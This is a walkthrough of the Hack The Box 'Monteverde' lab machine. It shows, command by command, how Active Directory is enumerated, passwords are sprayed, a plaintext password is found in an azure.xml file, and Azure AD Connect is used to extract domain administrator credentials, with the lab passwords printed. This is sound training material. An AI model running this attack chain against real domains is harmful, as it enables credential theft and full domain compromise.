Enumerate Credentials stored in Azure AD Connect and on a Domain Controller
Required Information:
- IP Address of the Server with Azure AD Connect installed.
- Tools that will do the Job for us.
Required Tools:
- Nmap: Scan for Ports and identify what kind of Server is running. Pro Tip: TCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests a domain controller.
- windapsearch: Tool for Active Directory Domain enumeration through LDAP queries. It contains several modules to enumerate users, groups, computers, as well as perform searching and unauthenticated information gathering.
- rpcclient: Enumerate usernames stored on the OS
- crackmapexec: Tool to find matching passwords predefined in a list
- Evil-WinRM: Used in post-exploitation pentesting
Most of the Tools are already installed in Kali and ParrotOS.
Let´s try those tools on a Virtual Machine. The Machine is called Monteverde and is hosted by Hackthebox. You can find more about it at: https://www.hackthebox.eu
TLDR:
The domain is enumerated and a user list is created. Through password spraying, the SABatchJobs service account is found to have the username as a password. Using this service account, it is possible to enumerate SMB Shares on the system, and the $users share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as mhope using WinRM. Enumeration shows that Azure AD Connect is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain
administrator).
Let´s start!
Steps to pwn the Machine:
- Enumeration
- Exploitation / Foothold
- Privilege Escalation
1. Enumeration
We start with checking for open Ports and get a idea of what services are running:
nmap -sC -sV -oA 10.10.10.172
We get the following output:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49673/tcp open unknown
49702/tcp open unknown
49771/tcp open unknownTCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests a domain controller. Port 445 is also very interisting and let´s us connect with rpcclient.
So let´s use rpcclient:
rpcclient -U ‘ ’ 10.10.10.172
Voila! We got a connection. Let´s enumarate all users with enumdomusers:
2. Foothold
Next step is creating a wordlist of all this users and with some luck we will get a matching password to a user:
Run CrackMapExec with this list of passwords and a list of the users:
crackmapexec smb 10.10.10.172 -u (User List) -p (Password List)
Now we have a Password for the User SABatchJobs:SABatchJobs. Now we have valid domain credentials. Let´s try to connect with smbmap and use those credentials we just found:
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -x whoami
Next we get into the users$ share to find more informations:
We found a file called azure.xml. The user associated with this file is mhope.
Open the file with cat:
cat 10.10.10.172-users_mhope_azure.xml
We find a line which has the Password:
<S N=”Password”>4n0therD4y@n0th3r$</S>
Now we have a Azure AD Password: 4n0therD4y@n0th3r$
Let´s try to connect with Evil-WinRM:
evil-winrm -i 10.10.10.172 -u mhope -p ‘4n0therD4y@n0th3r$’
Finally we got credentials of a user who is a member of the MEGABANK\Azure Admins group.
3. Privilege Escalation
To get a Domain Admin password we have to use a Powershell Script which uses a exploit. You can find the Azure-ADConnect.ps1 file at: https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1
- First we upload the Script via Evil-WinRM. With the -s flag we can upload the script from the memory:
evil-winrm -i 10.10.10.172 -u mhope -p “4n0therD4y@n0th3r$” -s .
Azure-ADConnect.ps1
2. Print the Password:
Get-ADConnectPassword
Let´s verify if the creds work:
evil-winrm -i 10.10.10.172 -u administrator -p ‘d0m@in4dminyeah!’
Done :)
Source:
Things that helped me: Official Writeup and the Tutorial created by IppSec which you can find here: https://www.youtube.com/watch?v=HTJjPZvOtJ4&feature=youtu.be
